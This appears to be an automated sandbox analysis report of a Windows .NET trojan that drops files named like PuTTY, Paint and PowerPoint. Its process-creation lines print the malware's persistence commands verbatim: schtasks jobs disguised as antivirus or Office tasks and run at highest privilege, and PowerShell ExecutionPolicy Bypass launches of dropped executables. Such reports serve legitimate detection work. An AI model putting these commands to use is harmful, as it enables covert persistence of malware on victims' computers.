Source: C:\Users\user\xdwdPutty.exe	Code function: 55_2_00007FFF60F5C012	55_2_00007FFF60F5C012
Source: C:\Users\user\xdwdPutty.exe	Code function: 55_2_00007FFF60F5B8C0	55_2_00007FFF60F5B8C0
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Code function: 64_2_00007FFF60F699A8	64_2_00007FFF60F699A8
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Code function: 64_2_00007FFF60F6B875	64_2_00007FFF60F6B875
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Code function: 64_2_00007FFF60F612D0	64_2_00007FFF60F612D0
Source: C:\Users\user\xdwdPutty.exe	Code function: 78_2_00007FFF60F399A8	78_2_00007FFF60F399A8
Source: C:\Users\user\xdwdPutty.exe	Code function: 78_2_00007FFF60F3B8C0	78_2_00007FFF60F3B8C0
Source: C:\Users\user\xdwdPutty.exe	Code function: 78_2_00007FFF60F3C012	78_2_00007FFF60F3C012

PE file contains strange resources

Source: ptKNiAaGus.exe	Static PE information: Resource name: RT_VERSION type: MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4"
Source: xdwdPutty.exe.0.dr	Static PE information: Resource name: RT_VERSION type: MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4"

Sample file is different than original file name gathered from version info

Source: ptKNiAaGus.exe, 00000000.00000002.3335122785.000000001BAD0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSendFile.dll2 vs ptKNiAaGus.exe
Source: ptKNiAaGus.exe, 00000000.00000002.3328765647.0000000012CA1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAutodesk AutoCAD Update.exeN vs ptKNiAaGus.exe
Source: ptKNiAaGus.exe, 00000000.00000000.858376455.0000000000762000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameAutodesk AutoCAD Update.exeN vs ptKNiAaGus.exe
Source: ptKNiAaGus.exe	Binary or memory string: OriginalFilenameAutodesk AutoCAD Update.exeN vs ptKNiAaGus.exe

Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, yRWQWPsqZ.cs	Security API names: File.GetAccessControl
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, yRWQWPsqZ.cs	Security API names: File.SetAccessControl
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, yRWQWPsqZ.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: ptKNiAaGus.exe, AFDAeWnBGIKu.cs	Security API names: File.GetAccessControl
Source: ptKNiAaGus.exe, AFDAeWnBGIKu.cs	Security API names: File.SetAccessControl
Source: ptKNiAaGus.exe, AFDAeWnBGIKu.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: ptKNiAaGus.exe, TJFZgosWeymV.cs	Security API names: File.GetAccessControl
Source: ptKNiAaGus.exe, TJFZgosWeymV.cs	Security API names: File.SetAccessControl
Source: ptKNiAaGus.exe, sXNNIwuBLyDCn.cs	Security API names: Directory.GetAccessControl
Source: ptKNiAaGus.exe, sXNNIwuBLyDCn.cs	Security API names: Directory.SetAccessControl
Source: ptKNiAaGus.exe, sXNNIwuBLyDCn.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, YmJpujMeeaLBNMa.cs	Security API names: File.GetAccessControl
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, YmJpujMeeaLBNMa.cs	Security API names: File.SetAccessControl
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, YmJpujMeeaLBNMa.cs	Security API names: File.GetAccessControl
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, YmJpujMeeaLBNMa.cs	Security API names: File.SetAccessControl
Source: xdwdPutty.exe.33.dr, YmJpujMeeaLBNMa.cs	Security API names: File.GetAccessControl
Source: xdwdPutty.exe.33.dr, YmJpujMeeaLBNMa.cs	Security API names: File.SetAccessControl
Source: ptKNiAaGus.exe, YcZNhzMi.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, KPKTbmek.cs	Security API names: Directory.GetAccessControl
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, KPKTbmek.cs	Security API names: Directory.SetAccessControl
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, KPKTbmek.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, WJEyDHemWfF.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: xdwdPutty.exe.33.dr, WJEyDHemWfF.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, rVDiXyUmB.cs	Security API names: Directory.GetAccessControl
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, rVDiXyUmB.cs	Security API names: Directory.SetAccessControl
Source: 0.2.ptKNiAaGus.exe.1bad0000.0.raw.unpack, Packet.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.ptKNiAaGus.exe.1bad0000.0.raw.unpack, Packet.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: ptKNiAaGus.exe, ngXUOZCVh.cs	Security API names: Directory.GetAccessControl
Source: ptKNiAaGus.exe, ngXUOZCVh.cs	Security API names: Directory.SetAccessControl
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, rVDiXyUmB.cs	Security API names: Directory.GetAccessControl
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, rVDiXyUmB.cs	Security API names: Directory.SetAccessControl
Source: xdwdPutty.exe.33.dr, KPKTbmek.cs	Security API names: Directory.GetAccessControl
Source: xdwdPutty.exe.33.dr, KPKTbmek.cs	Security API names: Directory.SetAccessControl
Source: xdwdPutty.exe.33.dr, KPKTbmek.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, KPKTbmek.cs	Security API names: Directory.GetAccessControl
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, KPKTbmek.cs	Security API names: Directory.SetAccessControl
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, KPKTbmek.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, yRWQWPsqZ.cs	Security API names: File.GetAccessControl
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, yRWQWPsqZ.cs	Security API names: File.SetAccessControl
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, yRWQWPsqZ.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: xdwdPutty.exe.33.dr, rVDiXyUmB.cs	Security API names: Directory.GetAccessControl
Source: xdwdPutty.exe.33.dr, rVDiXyUmB.cs	Security API names: Directory.SetAccessControl
Source: xdwdPutty.exe.33.dr, yRWQWPsqZ.cs	Security API names: File.GetAccessControl
Source: xdwdPutty.exe.33.dr, yRWQWPsqZ.cs	Security API names: File.SetAccessControl
Source: xdwdPutty.exe.33.dr, yRWQWPsqZ.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, WJEyDHemWfF.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.evad.winEXE@196/11@4/3

Source: C:\Users\user\Desktop\ptKNiAaGus.exe

File created: C:\Users\user\xdwdPutty.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2624:304:WilStaging_02
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Mutant created: \Sessions\1\BaseNamedObjects\Sheet_kctlwwmgcldm
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8556:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8324:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9676:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8820:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5320:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:712:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8620:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9676:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8556:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7712:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5872:304:WilStaging_02
Source: C:\Users\user\xdwdPutty.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9580:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9184:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2060:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4908:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7300:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7080:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:712:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2624:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7948:304:WilStaging_02
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Mutant created: \Sessions\1\BaseNamedObjects\Sheet_gwjvyiugty
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2060:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4908:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5872:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9580:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7948:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5320:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9132:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8620:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:10232:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9684:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:608:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4528:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7080:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:10232:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9684:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8324:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7752:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9132:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8820:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7300:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4528:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9184:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7712:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:608:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7752:304:WilStaging_02

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kvdx4sk4.juy.ps1

Jump to behavior

Source: ptKNiAaGus.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: ptKNiAaGus.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\ptKNiAaGus.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\xdwdPutty.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\xdwdPutty.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\xdwdPutty.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\ptKNiAaGus.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\ptKNiAaGus.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: ptKNiAaGus.exe

ReversingLabs: Detection: 83%

Source: C:\Users\user\Desktop\ptKNiAaGus.exe

File read: C:\Users\user\Desktop\ptKNiAaGus.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\ptKNiAaGus.exe "C:\Users\user\Desktop\ptKNiAaGus.exe"
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Avast Antivirus" /tr "C:\Users\user\xdwdPutty.exe" & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Avast Antivirus" /tr "C:\Users\user\xdwdPutty.exe"
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Google Drive" /tr "C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe" /RL HIGHEST & exit
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"' & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo 5 /tn "Google Drive" /tr "C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"'
Source: unknown	Process created: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe "C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "OpenOffice" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "OpenOffice" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe"
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe"' & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe"'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe"
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process created: C:\Users\user\xdwdPutty.exe "C:\Users\user\xdwdPutty.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Azure DevOps" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Azure DevOps" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" /RL HIGHEST
Source: C:\Users\user\xdwdPutty.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: unknown	Process created: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe "C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe"
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c scHTaSks /Run /I /TN "Avast Antivirus"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe scHTaSks /Run /I /TN "Avast Antivirus"
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: unknown	Process created: C:\Users\user\xdwdPutty.exe C:\Users\user\xdwdPutty.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\xdwdPutty.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe "C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe"
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c scHTaSks /Run /I /TN "Avast Antivirus"
